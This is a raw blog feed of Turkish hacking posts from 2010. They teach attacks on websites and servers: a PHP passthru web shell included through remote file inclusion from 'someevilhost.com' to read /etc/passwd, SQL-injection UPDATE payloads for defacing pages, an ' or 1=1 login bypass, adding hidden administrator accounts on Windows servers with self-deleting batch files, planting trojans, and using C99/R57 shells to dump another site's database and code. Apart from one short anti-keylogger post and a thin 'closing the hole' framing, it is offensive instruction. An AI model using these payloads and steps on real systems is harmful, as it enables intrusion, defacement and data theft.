&lt;a href="http://feedads.g.doubleclick.net/~a/qPQg23T1gvJqa9blA7VL3ZdkpiE/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/qPQg23T1gvJqa9blA7VL3ZdkpiE/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/VezirinInternetGnl/~4/pC5dehQEM9c" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://vezirist.blogspot.com/feeds/530334498862821021/comments/default" title="Kayıt Yorumları" /><link rel="replies" type="text/html" href="http://vezirist.blogspot.com/2010/10/hacking-anatomi.html#comment-form" title="0 Yorum" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4818381281339221921/posts/default/530334498862821021?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4818381281339221921/posts/default/530334498862821021?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/VezirinInternetGnl/~3/pC5dehQEM9c/hacking-anatomi.html" title="Hacking Anatomi" /><author><name>Vezir.04</name><uri>http://www.blogger.com/profile/02406787707276955003</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="24" height="32" src="http://2.bp.blogspot.com/-yqqUABA9vbg/TkZ-wbN81GI/AAAAAAAAACU/Hestb39hh18/s220/268428_10150251053314831_572829830_7105300_7388330_n.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://vezirist.blogspot.com/2010/10/hacking-anatomi.html</feedburner:origLink></entry><entry gd:etag="W/&quot;D08BRX8-eyp7ImA9Wx5XFUk.&quot;"><id>tag:blogger.com,1999:blog-4818381281339221921.post-4625332349658418647</id><published>2010-09-13T08:28:00.000-07:00</published><updated>2010-09-15T03:17:34.153-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-09-15T03:17:34.153-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="rfi açığı" /><category scheme="http://www.blogger.com/atom/ns#" term="rfi nedir?" /><category scheme="http://www.blogger.com/atom/ns#" term="rfi açığının kapatılması" /><title>Rfi açığını kapatma</title><content type="html">Merhaba arkadaşlar  herkes rfi'nin nasıl kulanıldığını bilir ama açığı nasıl kapatabiliriz onu bilmez bu yazıda rfi konusunda alınabilecek önlemler anlatılmıştır.&lt;br /&gt;&lt;br /&gt;Eğer sitenizde GET ve POST komutlarını içeren satırlar kullanıyorsanız ve bu komutların yazımlarını&lt;br /&gt;yanlış yaparsanız sitenizde geri dönüşü olmayan bir açık oluşabilir. Şimdi bu açığı kapatmanın&lt;br /&gt;yollarına bakalım.&lt;br /&gt;&lt;br /&gt;Bu kod $page girişi tam olarak arındırılmadığı için kullanılmamalıdır. $page input direkt olarak web sayfasına yönlendirilmiş ki bu yapılması gereken en son hatalardan biridir. Daima browserdan geçen her input (giriş) arındırılmalı. Kullanıcı web sayfasını ziyaret ettiğinde "files.php"yi ziyaret etmek için "File"a tıkladığında şöyle bir şey görünecek.&lt;br /&gt;&lt;blockquote&gt;&lt;a href=index.php?page=file1.php&gt;Files&lt;/a&gt;&lt;br /&gt;&lt;?php&lt;br /&gt;$page = $_GET[page];&lt;br /&gt;include($page);&lt;br /&gt;?&gt;&lt;/blockquote&gt;&lt;br /&gt;Bu koda istinaden aşağıdaki şekilde bir adres girersek browserımızdan neler olabilir?&lt;br /&gt;&lt;blockquote&gt;http://localhost/index.php?page=http://google.com&lt;/blockquote&gt;&lt;br /&gt;Büyük ihtimalle $page değişkeninin sayfaya orjinal olarak konulduğu yerde, google.com ana sayfasını elde ederiz. Burası kodcunun canının yakılabileceği yerdir. Web sayfasında olabilen daha basit bir şeye bakalım. RFI exploitinin daha çabuk ve kirli kullanımı sizin avantajınızadır. Şimdi "test.php" isimli bir dosya oluşturalım ve aşağıdaki kodu içine koyup kaydedelim.&lt;br /&gt;&lt;blockquote&gt;&lt;?php&lt;br /&gt;passthru($_GET[cmd]);&lt;br /&gt;?&gt;&lt;/blockquote&gt;&lt;br /&gt;Şimdi bu dosya, üzerinde RFI exploiti olan bir sayfaya dahil etmek için avantajınıza kullanabileceğiniz bir şeydir. PHP içindeki passthru() komutu çok tehlikelidir ve birçok host bunu "güvenlik nedenlerinden dolayı hizmet dışıdır" olarak alırlar. test.php içindeki bu kodla web sayfasına file inclusion exploiti de içeren şöyle bir istek gönderebiliriz&lt;br /&gt;&lt;blockquote&gt;http://localhost/index.php?page=http://someevilhost.com/test.php?cmd=cat /etc/passwd&lt;/blockquote&gt;&lt;br /&gt;Örnek olarak sitenizde kullandığınız satırlardan biri; $ornek = $HTTP_GET_VARS[“ornek”]; diyelim. Bu satırda kullanmış olduğunuz tırnaklar dışarıdan gelen uyarılara karşı son derece duyarlıdır. Yani kişi isterse “ornek” kodlaması yerine başka bir sunucudan exploit çağırabilir. Örneğin; http://www.sizinsite.com/index.php?urun=http://www.exploitsitesi.com/exploit.pl bu şekilde bir adresleme kullanıldığı takdirde exploit sizin sunucunuza yüklenir. Bu açığı kolay bir yöntemle kapatabilirsiniz. Öncelikle yapmanız gereken kullanmış olduğunuz GET ve POST komutunun içeriği. Eğer GET yada POST komutu ile veritabanına bağlantı yapıyorsanız bu bağlantıyı komuttan önce tanımlayın;&lt;br /&gt;&lt;blockquote&gt;$veriadi = “veriadi”.$id;&lt;/blockquote&gt;&lt;br /&gt;Daha sonra komutunuzu tırnak kullanmadan, başına dolar ($) koyarak sanki veritabanından çağırma yapıyorsunuz gibi kullanın;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4818381281339221921-4625332349658418647?l=vezirist.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/XXqxHPCCNrgrHjGgAxZIwLlDbdE/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/XXqxHPCCNrgrHjGgAxZIwLlDbdE/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/XXqxHPCCNrgrHjGgAxZIwLlDbdE/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/XXqxHPCCNrgrHjGgAxZIwLlDbdE/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/VezirinInternetGnl/~4/pAi7zt9HR-A" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://vezirist.blogspot.com/feeds/4625332349658418647/comments/default" title="Kayıt Yorumları" /><link rel="replies" type="text/html" href="http://vezirist.blogspot.com/2010/09/eger-sitenizde-get-ve-post-komutlarn.html#comment-form" title="0 Yorum" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4818381281339221921/posts/default/4625332349658418647?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4818381281339221921/posts/default/4625332349658418647?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/VezirinInternetGnl/~3/pAi7zt9HR-A/eger-sitenizde-get-ve-post-komutlarn.html" title="Rfi açığını kapatma" /><author><name>Vezir.04</name><uri>http://www.blogger.com/profile/02406787707276955003</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="24" height="32" src="http://2.bp.blogspot.com/-yqqUABA9vbg/TkZ-wbN81GI/AAAAAAAAACU/Hestb39hh18/s220/268428_10150251053314831_572829830_7105300_7388330_n.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://vezirist.blogspot.com/2010/09/eger-sitenizde-get-ve-post-komutlarn.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DEEBQno_eCp7ImA9Wx5SFU8.&quot;"><id>tag:blogger.com,1999:blog-4818381281339221921.post-8857333491582870769</id><published>2010-08-03T09:02:00.000-07:00</published><updated>2010-08-11T04:37:33.440-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-08-11T04:37:33.440-07:00</app:edited><title>Update olmaya sitelerde char kulanımı</title><content type="html">merhaba arkadaşlar bu yazımda tek harf update olan yada harf update olmayan sitelerde char'lama &lt;br /&gt;&lt;br /&gt;yönteminden bahsedecem ;&lt;br /&gt;&lt;br /&gt;Bir siteye girdiniz hata aldınız baktınız unclosed var tablo ve kolon adlarını çekerek update yapabilirsiniz &lt;br /&gt;&lt;br /&gt;tablo ve kolon adlarını aldıktan sonra bakıyorsunuz update olmuyor işte o sırada harflerle update yi &lt;br /&gt;&lt;br /&gt;engellemişlerdir ne yapabiliriz &lt;br /&gt;&lt;br /&gt;siteye yazacağımızı yazıyı char layarak yani şifreleyerek siteye update yapabiliriz &lt;br /&gt;&lt;br /&gt;mesela şu şekil &lt;br /&gt;&lt;br /&gt;http.//localhost/haber.asp?id=1 +update+Urunler+set+Tur='Hacked By Vezir;--&lt;br /&gt;&lt;br /&gt;bu şekil update olmadı ama tek harf yaptığınızda update oldu &lt;br /&gt;&lt;br /&gt;http.//localhost/haber.asp?id=1 +update+Urunler+set+Tur='H;--&lt;br /&gt;&lt;br /&gt;burda hacked by vezir kısmını char lıyarak yada hexe çevirerek update yapabilirsiniz&lt;br /&gt;&lt;br /&gt;http.//localhost/haber.asp?id=1 +update+Urunler+set+Tur=0x3c68313e4861636b65642062792056657a69722e3034;--&lt;br /&gt;&lt;br /&gt;http.//localhost/haber.asp?id=1 +update+Urunler+set+Tur=CHAR(86)+CHAR(101)%20CHAR(122)%20CHAR(105)%20CHAR(114)%20CHAR(46)%20CHAR(48)%20CHAR(52);--&lt;br /&gt;&lt;br /&gt;bu şekilde update yapabilirsiniz&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4818381281339221921-8857333491582870769?l=vezirist.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/Dq-vzD1JS5F0VBa8DGlUfacFUvg/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/Dq-vzD1JS5F0VBa8DGlUfacFUvg/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/Dq-vzD1JS5F0VBa8DGlUfacFUvg/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/Dq-vzD1JS5F0VBa8DGlUfacFUvg/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/VezirinInternetGnl/~4/96IvLEGJmIU" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://vezirist.blogspot.com/feeds/8857333491582870769/comments/default" title="Kayıt Yorumları" /><link rel="replies" type="text/html" href="http://vezirist.blogspot.com/2010/08/update-olmaya-sitelerde-char-kulanm.html#comment-form" title="1 Yorum" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4818381281339221921/posts/default/8857333491582870769?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4818381281339221921/posts/default/8857333491582870769?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/VezirinInternetGnl/~3/96IvLEGJmIU/update-olmaya-sitelerde-char-kulanm.html" title="Update olmaya sitelerde char kulanımı" /><author><name>Vezir.04</name><uri>http://www.blogger.com/profile/02406787707276955003</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="24" height="32" src="http://2.bp.blogspot.com/-yqqUABA9vbg/TkZ-wbN81GI/AAAAAAAAACU/Hestb39hh18/s220/268428_10150251053314831_572829830_7105300_7388330_n.jpg" /></author><thr:total>1</thr:total><feedburner:origLink>http://vezirist.blogspot.com/2010/08/update-olmaya-sitelerde-char-kulanm.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A0IBQX0yfyp7ImA9Wx5TGEk.&quot;"><id>tag:blogger.com,1999:blog-4818381281339221921.post-5127791107551756484</id><published>2010-08-03T08:31:00.000-07:00</published><updated>2010-08-03T08:32:30.397-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-08-03T08:32:30.397-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="sql" /><category scheme="http://www.blogger.com/atom/ns#" term="bypass" /><category scheme="http://www.blogger.com/atom/ns#" term="' or ' 1=1" /><title>Injection Flaws</title><content type="html">Injection Flaws &lt;br /&gt;&lt;br /&gt;Dinamik SQL sorgularının kullanıldığı sistemlerde oluşabilecek bir açıktır. &lt;br /&gt;&lt;br /&gt;Bir kullanıcı adı parola sınaması yapılan SQL cümleciğinde kullanılabilir. &lt;br /&gt;&lt;br /&gt;Select MemberID&lt;br /&gt;&lt;br /&gt;From Member &lt;br /&gt;&lt;br /&gt;Where Username = '" + txtUsername.Text + "' and Password = '" + txtPassword.Text + "'"&lt;br /&gt;&lt;br /&gt;Şeklinde bir SQL cümlesinin kullanıldığı bir sistemde aşağıdaki ifadeleri girelim&lt;br /&gt;&lt;br /&gt;txtUsername.Text : ' or 1=1 -- &lt;br /&gt;&lt;br /&gt;txtPassword.Text : 123-- &lt;br /&gt;&lt;br /&gt;ifadesi aşağıdaki SQL cümlesinin çalıştırılmasını sağlar&lt;br /&gt;&lt;br /&gt;Select MemberID &lt;br /&gt;&lt;br /&gt;From Member &lt;br /&gt;&lt;br /&gt;Where Username =or 1=1 -- ' and Password = ' " + txtPassword.Text + "'"-- ifadesi SQL Server için &lt;br /&gt;&lt;br /&gt;yorum satırı anlamına geldi için çalıştırılmaz.&lt;br /&gt;&lt;br /&gt;Where ifadesini inceleyelim : &lt;br /&gt;&lt;br /&gt;Username = '' false döner, 1 = 1 ise true. Or karşılaştırmasında ise False or True’nun sonucu true’dur.&lt;br /&gt;&lt;br /&gt;Dolayısıyla doğru kullanıcı adı parola girilmese dahi geriye tüm kayıtlar döner ve hacker ilk kaydın &lt;br /&gt;&lt;br /&gt;yetkisi ile içeriye giriş yapmış olur.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4818381281339221921-5127791107551756484?l=vezirist.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/A-64VrkgDhHrFOsQsyeK9TczDX8/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/A-64VrkgDhHrFOsQsyeK9TczDX8/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/A-64VrkgDhHrFOsQsyeK9TczDX8/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/A-64VrkgDhHrFOsQsyeK9TczDX8/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/VezirinInternetGnl/~4/B3ue-pBIIT8" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://vezirist.blogspot.com/feeds/5127791107551756484/comments/default" title="Kayıt Yorumları" /><link rel="replies" type="text/html" href="http://vezirist.blogspot.com/2010/08/injection-flaws.html#comment-form" title="0 Yorum" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4818381281339221921/posts/default/5127791107551756484?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4818381281339221921/posts/default/5127791107551756484?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/VezirinInternetGnl/~3/B3ue-pBIIT8/injection-flaws.html" title="Injection Flaws" /><author><name>Vezir.04</name><uri>http://www.blogger.com/profile/02406787707276955003</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="24" height="32" src="http://2.bp.blogspot.com/-yqqUABA9vbg/TkZ-wbN81GI/AAAAAAAAACU/Hestb39hh18/s220/268428_10150251053314831_572829830_7105300_7388330_n.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://vezirist.blogspot.com/2010/08/injection-flaws.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DUcEQHg7eip7ImA9WhRWEEQ.&quot;"><id>tag:blogger.com,1999:blog-4818381281339221921.post-1453664255209675196</id><published>2010-06-28T04:45:00.000-07:00</published><updated>2011-12-28T10:30:01.602-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-28T10:30:01.602-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="cmd" /><category scheme="http://www.blogger.com/atom/ns#" term="server root" /><category scheme="http://www.blogger.com/atom/ns#" term="win server" /><category scheme="http://www.blogger.com/atom/ns#" term="root" /><title>Win serverda root olma teknikleri</title><content type="html">Merhaba arkaşlar win server la ilgili bir döküman yazmak istedim fazla&lt;br /&gt;uzatmadan başlıyalım.bu yöntemi çogu kişi bilir eski bir yöntemdir bilmeyenler vardır diye düşünüp yayınlıyorum.&lt;br /&gt;&lt;br /&gt;bir win servera fso destekli bir scriptle girdigimiz zaman cmd  ile&lt;br /&gt;&lt;br /&gt;uzaktan komut iLe user ekleyip ;&lt;br /&gt;&lt;br /&gt;net user vezir 123456 /add &lt;br /&gt;&lt;br /&gt;şekLinde sonra net user localgroup administrator vezir /add &lt;br /&gt;&lt;br /&gt;şeklinde admin yetkisi verip server ip aLıp uzak masaüstü iLe bağlanıp istedigimizi yaparız bu bir yöntem ;&lt;br /&gt;&lt;br /&gt;Eğer ki user ekeleyemezseniz   &lt;br /&gt;net user administrator /random  &lt;br /&gt;&lt;br /&gt;komutuyla mevcut kullanicilarin şifrelerini öğrenebilirsiniz ;&lt;br /&gt;&lt;br /&gt;ama şöyle düşünelİm bir Nt servera girdik ve komut girme yetkimiz yok.&lt;br /&gt;&lt;br /&gt;neLer yapabiliriz şimdi uzaktan komut verip user ekLeyemiyoruz ama komut çaLıştırabiLiyoruz.&lt;br /&gt;&lt;br /&gt;o zaman hemen size bir puf noktası veriyorum. yazdığımız bir kodu .bat formatına çevirip uzaktan user ekliyecez&lt;br /&gt;&lt;br /&gt;hemen başlıyalım bir txt açın ;&lt;br /&gt;&lt;br /&gt;içine &lt;br /&gt;&lt;br /&gt;@echo&lt;br /&gt;net user vezir 123456 /add&lt;br /&gt;&lt;br /&gt;yazın ve vezir.bat die kayıt edin çalıştırın ve denetim masasından kullanıcı hesapLarına baktığınız zaman&lt;br /&gt;&lt;br /&gt;vezir adında bir user oluşturmuş olacak,&lt;br /&gt;&lt;br /&gt;şimdi hemen bir txt açıyoruz içine&lt;br /&gt;&lt;br /&gt;@echo&lt;br /&gt;net user vezir 123456 /add&lt;br /&gt;del vezir.bat&lt;br /&gt;&lt;br /&gt;yazıyoruz ve vezir.bat die kaydediyoruz ve çalıştırıyoruz &lt;br /&gt;&lt;br /&gt;ve komuttan sonra vezir.bat silinecegini göreceksiniz ve bu sayede fso içinde komut ekletip&lt;br /&gt;&lt;br /&gt;useri ekletip aynı şekilde administrator yetkisi vererek dosyaları sildirip root düzeyine erişebilİrsiniz.&lt;br /&gt;&lt;br /&gt;başka bir yöntem ; trojen ile buda basit bir olaydır arkadaşLar bir key bulun kendi serverınızı oluşturun.&lt;br /&gt;&lt;br /&gt;ve win servera upload edin :] serverda dosyayı çaLıştırın ve trojan buluşacaktır. gidin proğramın clientini&lt;br /&gt;&lt;br /&gt;açın ipden bağlanın ve client sayesinde proğram sayesinde pc ye bağlanın.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Bir daha ki dökümanda görüşmek dileği ile&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4818381281339221921-1453664255209675196?l=vezirist.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/duazv9GJHJoDYY_bG4uF-L9FCF8/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/duazv9GJHJoDYY_bG4uF-L9FCF8/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/duazv9GJHJoDYY_bG4uF-L9FCF8/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/duazv9GJHJoDYY_bG4uF-L9FCF8/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/VezirinInternetGnl/~4/HREAEH0yALI" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://vezirist.blogspot.com/feeds/1453664255209675196/comments/default" title="Kayıt Yorumları" /><link rel="replies" type="text/html" href="http://vezirist.blogspot.com/2010/06/win-serverda-root-olma-teknikleri.html#comment-form" title="0 Yorum" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4818381281339221921/posts/default/1453664255209675196?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4818381281339221921/posts/default/1453664255209675196?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/VezirinInternetGnl/~3/HREAEH0yALI/win-serverda-root-olma-teknikleri.html" title="Win serverda root olma teknikleri" /><author><name>Vezir.04</name><uri>http://www.blogger.com/profile/02406787707276955003</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="24" height="32" src="http://2.bp.blogspot.com/-yqqUABA9vbg/TkZ-wbN81GI/AAAAAAAAACU/Hestb39hh18/s220/268428_10150251053314831_572829830_7105300_7388330_n.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://vezirist.blogspot.com/2010/06/win-serverda-root-olma-teknikleri.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DkAGRH8_cCp7ImA9WxFUF08.&quot;"><id>tag:blogger.com,1999:blog-4818381281339221921.post-8664550202158137782</id><published>2010-06-28T04:31:00.000-07:00</published><updated>2010-06-28T04:32:05.148-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-06-28T04:32:05.148-07:00</app:edited><title>KeyloggerLardan Korunmak</title><content type="html">Açıklama : S.a Son Zamanlarda Bu Tür Keyloggerlar Her yerde Görülmeye Başladı Hatta NTVMSNBC Sitesine Bile Kod Koyarak Oraya Erişim Saglıyan İNTERNET Kullanıcılarına Büyük Tuzak Kurmuştular. Bu Keyloggerlar Kalvye'de Basılan Her Tuşu Kayıta Alıp "Hacker" veya Tuzak Kuran Kİşiye Gönderilir Tabi Bu Bilgiler ; Kredi Kartınız Olabilir , Sitenizin Şifreleri , Msn ŞifeLeriniz, Veya Daha Önemli Bİlgiler Olabilir. &lt;br /&gt;&lt;br /&gt;Bu Program Bize Ne Kolaylıklar Saglıyacak ; &lt;br /&gt;&lt;br /&gt;- Windows da yazdığımız yazıların kayıtlanmasını.&lt;br /&gt;- Klavyeden bastığımız her tuşun kayıtlanmasını.&lt;br /&gt;- Kopyala yapıştır yaparak girdiğimiz yazıların, şifrelerin kaydedilmesini.&lt;br /&gt;- O anda açık olan penceremizin screenshot'unun(ekran görüntüsünün) alınmasını.&lt;br /&gt;- Her türlü spy programlarının saldırısını.&lt;br /&gt;- HARDWARE KEYLOGGER'ların yazılarımızı, şifrelerimizi loglamasını.&lt;br /&gt;Program'ı İndirip Kurduktan Sonra Çalıştırılması İçin ;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;PHP- Kodu:&lt;br /&gt;&lt;br /&gt;&lt;Ctrl&gt;+&lt;Alt&gt;+&lt;Shift&gt;+&lt;P&gt;  &lt;br /&gt;&lt;br /&gt;PrivacyKeyboard Açılacaktır Ondan Sonra BANKA , MSN , MAİL Şifrelerinizi buradan Girerek Daha Güvenli Olmaktadır.&lt;br /&gt;&lt;br /&gt;Unutmayın İnternet %100 Güvenli Degildir Sadece Bu Önlemdir..&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;İndir&lt;br /&gt;&lt;br /&gt;http://anti-keylogger.com/downloads/prvkbd.zip&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4818381281339221921-8664550202158137782?l=vezirist.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/s9dYindqZRP2cumqFmV0sp1HZcM/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/s9dYindqZRP2cumqFmV0sp1HZcM/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/s9dYindqZRP2cumqFmV0sp1HZcM/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/s9dYindqZRP2cumqFmV0sp1HZcM/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/VezirinInternetGnl/~4/TEVPHWyssO8" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://vezirist.blogspot.com/feeds/8664550202158137782/comments/default" title="Kayıt Yorumları" /><link rel="replies" type="text/html" href="http://vezirist.blogspot.com/2010/06/keyloggerlardan-korunmak.html#comment-form" title="0 Yorum" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4818381281339221921/posts/default/8664550202158137782?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4818381281339221921/posts/default/8664550202158137782?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/VezirinInternetGnl/~3/TEVPHWyssO8/keyloggerlardan-korunmak.html" title="KeyloggerLardan Korunmak" /><author><name>Vezir.04</name><uri>http://www.blogger.com/profile/02406787707276955003</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="24" height="32" src="http://2.bp.blogspot.com/-yqqUABA9vbg/TkZ-wbN81GI/AAAAAAAAACU/Hestb39hh18/s220/268428_10150251053314831_572829830_7105300_7388330_n.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://vezirist.blogspot.com/2010/06/keyloggerlardan-korunmak.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DkYDQ38_eip7ImA9WxFUF08.&quot;"><id>tag:blogger.com,1999:blog-4818381281339221921.post-1361142578951675315</id><published>2010-06-28T04:20:00.001-07:00</published><updated>2010-06-28T04:22:52.142-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-06-28T04:22:52.142-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="script çekme" /><category scheme="http://www.blogger.com/atom/ns#" term="c99" /><category scheme="http://www.blogger.com/atom/ns#" term="r57" /><category scheme="http://www.blogger.com/atom/ns#" term="shell" /><title>Script çekme</title><content type="html">Bir sitenin serverına girdiniz sitenin scripti hoşunuza  gitti acaba nasıl bu scripti çekerim diyorsanız işte yapmanız gerekenler&lt;br /&gt;&lt;br /&gt;C99 atıyoruz servera ve databaseye bağlanıyoruz.Oralarda DUMP yazan bi buton olucak ona basarız ve SQL dosyası PC'ye inmeye başlar..&lt;br /&gt;&lt;br /&gt;R57 atıyoruz siteye ve komut satırımıza yani run command yazan yere alttaki komutu yazıyoruz.&lt;br /&gt;&lt;br /&gt;Kod:&lt;br /&gt; &lt;br /&gt;cd /İSTEDĞİNİZ SİTENİN UShome/SCRİPTİNİ ER ADI/public_html/;tar cvzf /home/KAYDETME DİZİN/public_html/yedek.tar.gz *&lt;br /&gt;&lt;br /&gt;Böylece rarlanmış olarak inicek PC'ye dosyalar..&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4818381281339221921-1361142578951675315?l=vezirist.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/oEpcd4l1naNPYbvFa2LUpXKikpw/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/oEpcd4l1naNPYbvFa2LUpXKikpw/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/oEpcd4l1naNPYbvFa2LUpXKikpw/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/oEpcd4l1naNPYbvFa2LUpXKikpw/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/VezirinInternetGnl/~4/h6EdYXCZdHg" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://vezirist.blogspot.com/feeds/1361142578951675315/comments/default" title="Kayıt Yorumları" /><link rel="replies" type="text/html" href="http://vezirist.blogspot.com/2010/06/script-cekme.html#comment-form" title="0 Yorum" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4818381281339221921/posts/default/1361142578951675315?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4818381281339221921/posts/default/1361142578951675315?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/VezirinInternetGnl/~3/h6EdYXCZdHg/script-cekme.html" title="Script çekme" /><author><name>Vezir.04</name><uri>http://www.blogger.com/profile/02406787707276955003</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="24" height="32" src="http://2.bp.blogspot.com/-yqqUABA9vbg/TkZ-wbN81GI/AAAAAAAAACU/Hestb39hh18/s220/268428_10150251053314831_572829830_7105300_7388330_n.jpg" 